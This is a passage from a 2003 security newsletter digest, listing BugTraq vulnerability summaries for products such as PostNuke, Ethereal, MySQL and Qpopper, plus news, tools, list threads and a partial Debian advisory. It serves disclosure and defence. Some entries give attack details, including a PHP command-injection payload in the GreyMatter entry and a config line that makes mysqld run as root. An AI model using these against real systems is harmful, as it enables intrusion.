result in a malicious executable attachment bypassing the filter and
being executed by the recipient.
Other file types may be allowed through the filter in this way, however,
this has not been confirmed.
The discoverer of this vulnerability states that the vendor has released
an advisory, however, the vendor has not made any public confirmation.
6. SimpleBBS Users.php Insecure File Permissions Vulnerability
BugTraq ID: 7045
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7045
Summary:
SimpleBBS is a freely available, open source PHP Bulletin Board. It is
available for the Unix and Linux operating systems.
SimpleBBS reportedly creates the user database 'users.php' with
world-readable permissions in the SimpleBBS web root. User credentials
are stored in plain text format. As a result anyone who may have access
to the SimpleBBS website may view stored user information contained in
the SimpleBBS user database.
This vulnerability was reported for SimpleBBS 1.0.6. It is not known if
earlier versions are affected by this vulnerability.
7. Microsoft Windows XP Safe Mode Policy Bypass Weakness
BugTraq ID: 7046
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7046
Summary:
Microsoft Windows allows users to start the operating system in "Safe
Mode" to allow troubleshooting of configuration settings and device
driver conflicts.
The Microsoft Knowledgebase states that only members of the local
Administrators group are able to log in to a system that has been started
in Safe Mode.
When the Windows XP "Welcome Screen" is enabled, it is possible for
unprivileged users to log into the system when it is started in Safe
Mode. Normally in Safe Mode with the Welcome Screen enabled, only the
names of administrative accounts are visible. If the user holds down the
left CTRL and ALT keys and presses delete twice, the normal login prompt
will be displayed. At this point, an unprivileged user can log in to the
system in Safe Mode.
8. PostNuke Phoenix Member_List Module SQL Injection Vulnerability
BugTraq ID: 7047
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7047
Summary:
A vulnerability has been discovered in PostNuke Phoenix v0.723 and
earlier. Specifically, the Members_List module fails to sufficiently
sanitize user-supplied input, making it prone to SQL injection attacks.
Exploitation may allow for modification of SQL queries, resulting in
information disclosure, or database corruption. The consequences depend
on the nature of specific queries. This issue may allow the attacker to
exploit latent vulnerabilities in the underlying database.
It should be noted that the precise technical details regarding this
vulnerability are currently unknown. This BID will be updated as more
information is made available.
9. PostNuke Phoenix Theme Handling Remote Code Execution Vulnerability
BugTraq ID: 7048
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7048
Summary:
A vulnerability has been discovered in PostNuke Phoenix 0.723 and
earlier. The problem occurs in the theme handling engine and may be
triggered through the use of directory traversal sequences.
Although unconfirmed, it may be possible to exploit this issue to execute
arbitrary commands on a target server with the privileges of the
webserver.
The precise technical details regarding this issue are currently unknown.
This BID will be updated as more information is made available.
10. Ethereal SOCKS Dissector Format String Vulnerability
BugTraq ID: 7049
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7049
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The Ethereal SOCKS dissector is a mechanism for decoding the SOCKS
protocol. A format string vulnerability has been reported in some
versions of this dissector. The vulnerability exists in the
packet-socks.c source file.
An attacker can exploit this vulnerability by connecting to a vulnerable
SOCKS server and sending malicious format string specifiers to the SOCKS
server. If Ethereal is being used as a security tool to monitor network
packets, it is possible that sensitive memory may be corrupted.
This has been confirmed to result in a denial of service condition.
Additionally, it may be possible to cause Ethereal to execute malicious
attacker-supplied code.
This vulnerability affects Ethereal 0.9.9 and earlier.
11. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
BugTraq ID: 7050
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7050
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The NTLMSSP (NTLM Security Support Provider) dissector is a mechanism for
evaluating packets that use the NTLM protocol. A heap corruption
vulnerability has been reported for some versions of the dissector.
The precise technical details of this vulnerability are currently
unknown. This BID will be updated as further information is available.
An attacker may be able to exploit this vulnerability by crafting a
specially formed packet and sending it to a system using the NTLMSSP
dissector or by convincing a victim user to use Ethereal to read a
malformed packet trace file.
Due to the nature of this vulnerability it may be possible for an
attacker to create a situation in which sensitive memory could be
overwritten. If successful this may allow for the execution of arbitrary
code with the privileges of the Ethereal process.
This vulnerability affects Ethereal 0.9.9 and earlier.
12. Upload Lite Arbitrary File Upload Vulnerability
BugTraq ID: 7051
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7051
Summary:
Upload Lite is a Perl CGI script designed to allow remote users to upload
files to a server.
A vulnerability has been reported for Upload Lite that may allow remote
attackers to upload arbitrary files.
Specifically, the script only checks to see whether the file to be
uploaded has a certain extension. As such, any file that includes the
allowed extensions may be uploaded. Any uploaded files will be stored in
the specified folder.
Given the ability to upload arbitrary files to the host, an attacker can
exploit this vulnerability to upload malicious applications to the
vulnerable system or use the system for the storage of files.
This vulnerability was reported for Upload Lite 3.22.
13. MySQL mysqld Privilege Escalation Vulnerability
BugTraq ID: 7052
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7052
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered for MySQL that may allow the mysqld
service to start with elevated privileges.
MySQL uses a series of configuration files to set the privileges of the
service. The configuration files are typically stored in /etc/my.cnf,
DATADIR/my.cnf and ~/.my.cnf. When executed, the mysqld service reads
configuration information from /etc/my.cnf first, then DATADIR/my.cnf and
finally ~/.my.cnf.
An attacker can exploit this vulnerability by creating a DATADIR/my.cnf
that includes the line 'user=root' under the '[mysqld]' option section.
Furthermore, the ~/.my.cnf file must not exist.
When the mysqld service is executed, it will run as the root user instead
of the default user.
This may allow an attacker to obtain elevated privileges on a compromised
system.
This vulnerability was reported for MySQL 3.23.55.
14. PeopleSoft PeopleTools SchedulerTransfer Remote Command Execution Vulnerability
BugTraq ID: 7053
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7053
Summary:
PeopleTools is a runtime architecture and integrated development
environment for PeopleSoft financial management software.
A remote command execution vulnerability exists in the PeopleSoft
PeopleTools "SchedulerTransfer" servlet. This servlet facilitates
migration of reports.
This issue occurs because the servlet does not sufficiently validate
externally supplied data. Exploitation may allow malicious files to be
written to the system hosting the software and executed with the
privileges of the web server.
It is possible to overwrite existing Java servlet with malicious data by
submitting a request that contains directory traversal sequences, though
this is only one possible attack.
The servlet is installed by default in many PeopleSoft installations and
also permits access by unauthenticated remote users by default.
15. GreyMatter WebLog Remote Command Execution Vulnerability
BugTraq ID: 7055
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7055
Summary:
GreyMatter WebLog is an open source weblog software package available for
the Unix and Linux operating systems.
A problem in the software may allow unauthorized access to systems using
the vulnerable software.
It has been reported that a problem in GreyMatter weblog may allow
unauthorized access to systems. Due to improper sanitization of
untrusted input, it may be possible for a remote user to execute commands
on the local system.
The problem is in the handling of user comments by the weblog software.
Due to improper sanitization of the input passed through the weblog
comments fields, an attacker could potentially insert specially crafted
commands such as <?php system(echo($cmd)) ?>. This would in turn result
in the execution of these commands with the privileges of the web server
process.
16. Microsoft Internet Explorer .MHT File Buffer Overflow Vulnerability
BugTraq ID: 7057
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7057
Summary:
Microsoft Internet Explorer allows a web page and all content embedded
within to be saved in a Web Archive format using Multipurpose Internet
Mail Extension HTML (MHTML) format. This format saves the entire page
and all the embedded content as a single .mht file.
The .mht files are encoded and decoded by the inetcomm.dll component.
This component does not appear to perform sufficient bounds checking on
the .mht files.
If encoded data within the .mht file is designated as executable or the
Content-Type is not defined and has a single word 'MZP' encoded within, a
buffer will be overrun and Internet Explorer will fail. If the encoded
content begins with 'TvPQ' it will be interpreted by Internet Explorer as
a Win32 executable file, but inetcomm.dll will decode it as plain text
data and assign a small buffer to the data.
Internet Explorer creates a stream for the executable file with a smaller
buffer than is required by the Base64 decoder. This results in the
buffer being overrun and Internet Explorer failing. The EIP register may
also be overwritten, potentially allowing for execution of arbitrary code
within the security context of Internet Explorer.
The Web Archive feature was introduced in Internet Explorer 5, therefore
earlier versions are not affected. Outlook Express must be installed in
order to obtain the Web Archive functionality through Internet Explorer.
Applications that use Internet Explorer to render HTML content, such as
Outlook and Outlook Express, may also be indirectly vulnerable. An HTML
email message containing a malicious .mht file would be executed by
Internet Explorer.
17. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow Vulnerability
BugTraq ID: 7054
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7054
Summary:
DeleGate is an open source proxy server developed by Yutaka Sato.
DeleGate allows for proxying of several application protocols, including
HTTP. It is available for multiple platforms, including Microsoft
Windows and Unix and Linux variants.
The DeleGate HTTP Proxy component is prone to a remotely exploitable
buffer overflow vulnerability. This is due to insufficient bounds
checking of User-Agent: fields in remote 'robot.txt' files. It is
reported that it is possible to trigger this issue by specifying multiple
lines of User-Agent: data in the file, which will cause an internal array
of pointers to be overflowed with attacker-supplied data. This will
occur when a malicious 'robot.txt' file is retrieved via the proxy.
Successful exploitation may result in execution of malicious code in the
security context of the DeleGate proxy server.
This issue was reported in DeleGate versions 8.3.4 and 8.4.0. Other
versions may also be affected.
18. Opera Long Filename Download Buffer Overrun Vulnerability
BugTraq ID: 7056
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7056
Summary:
Opera is a web browser available for a number of platforms, including
Microsoft Windows, Linux and Unix variants and Apple MacOS.
A vulnerability has been discovered in various versions of Opera on the
Microsoft Windows platform.
When specific types of files are downloaded by Opera, the transfer is
displayed within a 'Download Dialog'. Due to insufficient bounds checking
when processing the requested filename, it may be possible for memory to
be corrupted.
Specifically, when a filename is to be displayed within the 'Download
Dialog' the type of file must be verified. When this occurs, the filename
in question is copied into a static buffer on the stack.
By hosting a downloadable file containing a name of excessive length, it
may be possible for an attacker to overwrite sensitive memory locations
within Opera. Successful exploitation of this issue would result in the
execution of arbitrary attacker-supplied commands.
It should be noted that this issue affects Opera versions 6 and 7 on the
Microsoft Windows platform.
19. Qpopper Remote Memory Corruption Vulnerability
BugTraq ID: 7058
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7058
Summary:
Qpopper is a POP3 mail server available for Linux and Unix based systems.
A vulnerability has been discovered when calling the 'mdef' command. The
issue presents itself due to the incorrect assumption of the Qvsnprintf()
function. The function is meant to be a replacement for the C function
vsnprintf() but, unlike the latter function, Qvsnprintf() fails to NULL
terminate buffers.
A memory corruption vulnerability has been discovered in Qpopper when
processing a malicious 'mdef' command, as a result of the lack of NULL
termination by Qvsnprintf(). The vulnerability specifically occurs in the
pop_msg() function when filling the 'message' buffer with a user-supplied
macro name. The pop_msg() function incorrectly assumes that the 'message'
buffer will be null terminated after being filled via the Qvsnprintf()
function. A CRLF sequence and null terminator (CRLF+N) is later appended
to the data which may overwrite memory at a location adjacent to the
buffer.
By exploiting this to overwrite the LSB of a saved frame pointer, it is
possible to influence the program in such a way that attacker-supplied
instructions can be executed.
This vulnerability affects Qpopper versions 4.0.4 and earlier. It should
be noted that the exploitability of this issue is highly dependant on the
memory layout, which will likely be influenced by compiler optimization.
20. SMC Router Backup Tool Plaintext Password Weakness
BugTraq ID: 7059
Remote: No
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7059
Summary:
SMC SMC7004VWBR is a wireless Cable/DSL broadband router with integrated
wireless access point and SPI firewall.
It has been reported that the SMC router backup tool stores router
administration credentials in plaintext format. The router administration
password is stored in the file 'backup_config.exe'. Furthermore, the
password is prefixed by the word 'root' making it easily identifiable by
an attacker.
This weakness may result in unauthorised users disclosing sensitive
router configuration information from the router backup file.
This vulnerability has been reported to affect SMC SMC7004VWBR devices,
however other products may also be affected.
21. LXR Cross-Referencer Arbitrary File Disclosure Vulnerability
BugTraq ID: 7062
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7062
Summary:
LXR Cross-Referencer is a general purpose source code indexer and
cross-referencer that provides web-based browsing of source code.
It has been reported that LXR Cross-Referencer does not sufficiently
sanitize user-supplied input submitted via URI parameters. Specifically
data supplied via the 'v' variable to the 'source' script is not
sufficiently stripped of directory traversal (../) sequences.
Allegedly, the exploitation of this vulnerability may result in the
disclosure of arbitrary web server readable files.
Successful exploitation may permit the attacker to gain access to
sensitive information that may aid in mounting further attacks against
the system hosting the software.
22. Multiple PHP-Nuke Forums/Private_Messages SQL Injection Vulnerabilities
BugTraq ID: 7060
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7060
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the Forums
scripts and 'Private_Messages' module of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain functions. A remote attacker may take advantage of
these issues to inject malicious data into SQL queries, possibly
resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
23. VPOPMail vpopmail.php Remote Command Execution Vulnerability
BugTraq ID: 7063
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7063
Summary:
VPOPMail is a plugin designed for use with SquirrelMail. It is
implemented in PHP and allows a user to manage a qmail system with
virtual domains.
A vulnerability has been reported for VPOPMail that may allow attackers
to execute arbitrary commands on a vulnerable system. The vulnerability
exists due to insufficient sanitization of user-supplied input.
As the vpopmail.php script does not properly sanitize the values for the
'$vpasswd', '$username' and '$pwd' variables, it is possible for an
attacker to include malicious system commands by manipulating URI
parameters. This will result in the execution of the attacker-supplied
commands with the privileges of the web server.
This vulnerability was reported for VPOPMail 0.97 and earlier.
24. HP VVOS 11.04 HFS Unauthorized Access Vulnerability
BugTraq ID: 7065
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7065
Summary:
Virtual Vault Operating System (VVOS) is a commercially-available
operating system distributed by HP.
HP has announced a vulnerability in the HP VVOS HFS file system that may
result in unauthorized file access by malicious parties. Unauthorized
access to files may allow for disclosure of sensitive information or
other consequences.
HP has not released further technical details about the nature of this
vulnerability. If further details do become available, this BID will be
updated.
25. Sun SUNWlldap Library Hostname Buffer Overflow Vulnerability
BugTraq ID: 7064
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7064
Summary:
The SUNWlldap package, available for Sun Solaris x86, includes various
LDAP clients and an LDAP client library used to provide programmatic
access to the LDAP protocol.
The SUNWlldap package has been reported vulnerable to a buffer overflow
condition.
Reportedly if LDAP is enabled in the '/etc/nsswitch.conf' system file, an
application that is linked to the LDAP shared library may be affected by
this vulnerability.
Using an affected application to resolve a malicious hostname of
excessive length can trigger the overflow. This condition is likely due
to insufficient bounds checking, when the hostname is processed a buffer
will be overrun and sensitive locations in memory will be overwritten.
Exploitation of this vulnerability may lead to arbitrary code execution
within the context of the application utilizing the vulnerable LDAP
library.
It should be noted that, although it has not been confirmed, the
vulnerability might occur in the getbyname() function.
This vulnerability has been reported to affect 'SUNWlldap 11.8.0'
previous versions may also be affected.
26. Man Program Unsafe Return Value Command Execution Vulnerability
BugTraq ID: 7066
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7066
Summary:
Man is a freely available, open source manual page program. It is
available mainly for Linux operating systems, though it can be used on
other UNIX operating system variants.
A problem with the program may make it possible to launch local attacks
on users through malicious man pages.
It has been reported that the man program does not properly handle some
types of input. When a man page is processed that could pose a potential
security risk, the program reacts in a way that may open a window of
opportunity for an attacker to execute arbitrary commands.
The problem is in the value returned by the man program when a
potentially dangerous man page is processed. The man program returns the
string 'unsafe' which is in turn passed to a system() call. If a program
located in the user's path was named 'unsafe' the program would be
executed with the privileges of the man program user.
27. Multitech RouteFinder Remote Memory Corruption Vulnerability
BugTraq ID: 7067
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7067
Summary:
A vulnerability has been discovered in Multitech RouteFinder 550 VPN
firmware release 4.63 and earlier. The problem occurs due to insufficient
bounds checking of data supplied in HTTP GET requests. Specifically, it
is possible to trigger the condition by sending a GET /OPTIONS request to
a vulnerable device, containing at least 10001 bytes of data.
Passing excessive data to the device may make it possible for a remote
attacker to corrupt memory.
Successful exploitation of this bug may result in a denial of service,
causing the device to crash. A manual restart would be required to
restore functionality.
Although it has not been confirmed, it may also be possible for an
attacker to exploit this issue to execute arbitrary commands.
28. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
BugTraq ID: 7068
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7068
Summary:
SaveMyModem is mail filtering software. It is available for Microsoft
Windows and Unix and Linux platforms.
SaveMyModem is prone to a buffer overflow in the 'statusbar_set_text'
function. In some instances, this function will be called with
externally supplied data, such as when messages are processed. The
vulnerable function includes a call to vsnprintf(), specifying a source
buffer that is much larger than the destination buffer.
When the vulnerable function is called with externally supplied data, it
may be possible to corrupt sensitive regions of data. This may
potentially occur if a message is processed with an excessively long
subject.
Successful exploitation will result in code execution in the context of
the SaveMyModem process.
29. HP J6038A JetDirect 310x Print Server For Fast Ethernet Unspecified Vulnerabilities
BugTraq ID: 7070
Remote: Yes
Date Published: Mar 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7070
Summary:
The HP JetDirect 310x is a series of network print servers.
Unspecified vulnerabilities have been reported by HP in J6038A JetDirect
310x Print Servers running version Q.24.06 firmware. Unauthorized access
to print servers may result from successful exploitation. A potential
for denial of service attacks has also been reported by the vendor.
HP has released a firmware upgrade in response.
This BID will be updated if further technical details become available.
III. SECURITYFOCUS NEWS AND COMMENTARY
--------------------------------------
1. Hi-Tech Surveillance Firm Prospers
By Kevin Poulsen
If you're under FBI surveillance, there's a good chance your phone calls
and Internet traffic are traveling over the equipment of Verint Systems
-- a company that's doing very well these days.
http://www.securityfocus.com/news/3115
2. Homeland Cybersecurity Efforts Doubted
By Michael Fitzgerald
As the new Department of Homeland Security swallows nearly every
cybersecurity office in the U.S. government, high-profile leaders are
jumping ship, and analysts worry that only meager funding and muddled
goals remain.
http://www.securityfocus.com/news/3043
3. RSA and Verisign beat SSL patent infringement rap
By John Leyden, The Register
An American jury has rejected claims by a retired Florida engineer that
RSA Security and VeriSign infringed his encryption patent.
http://www.securityfocus.com/news/3130
4. For sale: memory stick plus cancer patient records
By John Leyden, The Register
Health bosses in Lancashire are facing awkward questions after
confidential medical records of 13 cancer patients found there way onto a
portable memory stick, which was repackaged and sold as new to a Crewe
estate agent.
http://www.securityfocus.com/news/3129
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. KisMAC v0.04a
by mick
Relevant URL:
http://kismac.binaervarianz.de/
Platforms: MacOS
Summary:
KisMAC is a stumbler application for Mac OS X that puts your card into
monitor mode. Unlike most other applications for OS X, it is completely
invisible and sends no probe requests.
2. psmon v1.0.0
by perlguy
Relevant URL:
http://psmon.perlguy.org.uk/
Platforms: UNIX
Summary:
psmon is a Perl script which can be run as a stand-alone program or a
fully functional background daemon, capable of logging to syslog with
customisable email notification facilities. The user defines a set of
rules in an Apache-style plain text configuration file. These rules
describe what processes should always be running on the system, and any
limitations on concurrent instances, TTL, and maximum CPU/memory usage of
processes. psmon scans the UNIX process table and, using the set of rules
defined in the configuration file, will respawn any dead processes, and
slay or "deal with" any aggressive or illegal processes.
3. eXtended Allow - Deny list for PAM v0.4
by Adrian Ber berad-@yahoo.com
Relevant URL:
http://www.geocities.com/beradrian/soft/xad/index.html
Platforms: Linux, POSIX
Summary:
XAD is a very easy to configure PAM module. Through a very easy language
you can allow/deny access to users.
4. C-Kermit v8.0.208
by Frank da Cruz
Relevant URL:
http://www.columbia.edu/kermit/ckermit.html
Platforms: AIX, FreeBSD, HP-UX, Linux, MacOS, NetBSD, OpenBSD, SCO,
Solaris, SunOS
Summary:
C-Kermit is a combined serial and network communication software package
offering a consistent, medium-independent, cross-platform approach to
connection establishment, terminal sessions, file transfer, character-set
translation, numeric and alphanumeric paging, and automation of
communication tasks. Recent versions include FTP and HTTP clients as well
as an SSH interface, all of which can be scripted and aware of
character-sets. It supports built-in security methods, including Kerberos
IV, Kerberos V, SSL/TLS, and SRP, FTP protocol features such as MLSD, and
source-code parity with Kermit 95 2.1 for Windows and OS/2.
5. trafcalc v1.0
by cyberny
Relevant URL:
http://trafcalc.sourceforge.net/
Platforms: Linux, POSIX
Summary:
Trafcalc calculates the size of the TCP-payload on a system via packet
capturing and connection tracking at the user level instead of the IP
level.
6. Ish v1.5.1
by Niels Möller
Relevant URL:
http://www.lysator.liu.se/~nisse/lsh/
Platforms: POSIX
Summary:
Ish is a GNU GPL-licensed implementation of the SSH (version 2) protocol.
It includes a server, a client, and some utility programs.
V. SECURITY JOBS SUMMARY
------------------------
1. Looking for Disaster Recovery Analyst for Los Angeles CA (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314955
2. Any hints for Australia? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314961
3. Experienced Security Professional looking for Bay Area openings (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314962
4. Experienced Security Software consultant, CISSP (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314758
5. INFOSEC Systems Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314752
6. FW: IT Security Evangelist for Italy (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314721
7. Senior Security Engineer/Analyst (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314722
8. Senior Engineering Manager-Security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314656
9. Systems Engineer-Chicago, Minneapolis, Houston and St. Louis (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314645
10. Information Security Manager, UK (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314653
11. Security Engineer (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314633
12. Security Awareness & Training Manager vacancy (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314664
13. Account Executive (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314632
14. Looking for a job in England (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314654
15. Sales Engineer, APac (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314435
16. Senior Level Security Consultant needed in DC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314441
17. RACF Project Sought - 20 Year Veteran Supporting RACF DB2 Database for Windows 2000 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314325
18. PFR Thread (Thread)
Relevant URL:
http://online.securityfocus.com/archive/77/314231
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Outlook HTML crash (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314953
2. su core dumped with signal 3. BSD/OS 3.0, 3.1 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314952
3. Win32hlp exploit for : ":LINK overflow" (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314951
4. Apache 2.x leaked descriptors (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314923
5. gtali Segmentation fault (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314929
6. FW: Outlook HTML crash (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314939
7. Mordred Security Labs now online (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314927
8. xscreensaver exploit for Redhat 7.3 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314586
9. Windows Shellcode - Using Detached_Process flag (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314587
10. Why SUID Binary exploit does not yield root shell? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314446
11. /usr/sbin/sendmail (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314423
12. Fwd: Kazaa file corruption (Thread)
Relevant URL:
http://online.securityfocus.com/archive/82/314273
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. SQL Service Pack doesn't upgrade SQL Server (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314825
2. Exchange/MAPI/RPC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314807
3. DisableIPSourceRouting registry key (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314667
4. SecurityFocus Microsoft Newsletter #128 (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314565
5. AW: Exchange/MAPI/RPC (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314561
6. SV: DisableIPSourceRouting registry key (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314493
7. Worm.Dvldr analysis report (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314519
8. Article Announcement: Cryptographic Filesystems: Design and Implementation (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314351
9. Free SQL chapter available on www.SpecialOpsSecurity.com (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314324
10. AD replication - IP site to site encryption? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314292
11. User rights on Terminal Services (Thread)
Relevant URL:
http://online.securityfocus.com/archive/88/314294
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. Solaris disk wipe utilitiy? (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314816
2. Sun Security Admin Beta Exam.... (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314652
3. SecurityFocus Article Announcement - Cryptographic Filesystems: Design and Implementation (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314555
4. Kernel modules (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314534
5. Administrivia (Thread)
Relevant URL:
http://online.securityfocus.com/archive/92/314349
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. Port 113 security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314827
2. Traffic Shaping. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314730
3. SecurityFocus Article Announcement (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314566
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored By: NetIQ
Need security policies? Don't start from scratch..."Information Security
Policies Made Easy" is the best security policy resource guide you can
buy with 1300+ ready-to-use security policies that can be quickly
customized for any company. Build best practice security policies in
half the time and expense. Also check out "Information Security Roles &
Responsibilities Made Easy. "
Download a free policy now at http://www.netiq.com/order/publications.asp
------------------------------------------------------------------------------
===============================================================================
End of Doc 2
===============================================================================
===============================================================================
3.) [SECURITY] [DSA 258-1] New ethereal packages fix arbitrary code execution
===============================================================================
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 258-1 secu-@debian.org
http://www.debian.org/security/ Martin Schulze
March 10th, 2003 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : ethereal
Vulnerability : format string vulnerability
Problem-Type : remote
Debian-specific: no
CVE Id : CAN-2003-0081
Georgi Guninski discovered a problem in ethereal, a network traffic
analyzer. The program contains a format string vulnerability that
could probably lead to execution of arbitrary code.
For the stable distribution (woody) this problem has been fixed in
version 0.9.4-1woody3.
For the old stable distribution (potato) does not seem to be affected
by this problem.
For the unstable distribution (sid) this problem has been fixed in
version 0.9.9-2.
We recommend that you upgrade your ethereal packages.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3.dsc
Size/MD5 checksum: 679 d1d61066e2bf5c4f3ae2c842dc238ea0
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3.diff.gz
Size/MD5 checksum: 34387 d2b4229ac5009eba25f3ff214dfa3dd2
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4.orig.tar.gz
Size/MD5 checksum: 3278908 42e999daa659820ee93aaaa39ea1e9ea
Alpha architecture:
http://security.debian.org/pool/updates/main/e/ethereal/ethereal_0.9.4-1woody3_alpha.deb
Size/MD5 checksum: 1939124 0ffa4e1947a996741ca37455ffd7f4c2
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-common_0.9.4-1woody3_alpha.deb
Size/MD5 checksum: 333660 710e12a1b2961ab791897c114c1e7207
http://security.debian.org/pool/updates/main/e/ethereal/ethereal-dev_0.9.4-1woody3_alpha.deb
Size/MD5 checksum: 221454 02e5b338717337a5dd3b400fa8f8c7ce
http://security.debian.org/pool/updates/main/e/ethereal/tethereal_0.9.4-1woody3_alpha.deb
Size/MD5 checksum: 1706050 0b645d3c030c33e8f29ebee354a6b546
ARM architecture:
